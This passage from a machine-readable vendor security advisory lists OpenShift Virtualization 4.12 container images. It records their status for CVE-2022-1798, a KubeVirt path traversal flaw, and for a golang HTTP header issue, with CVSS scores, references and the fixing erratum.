"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/http: improper sanitization of Transfer-Encoding header", }, { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", 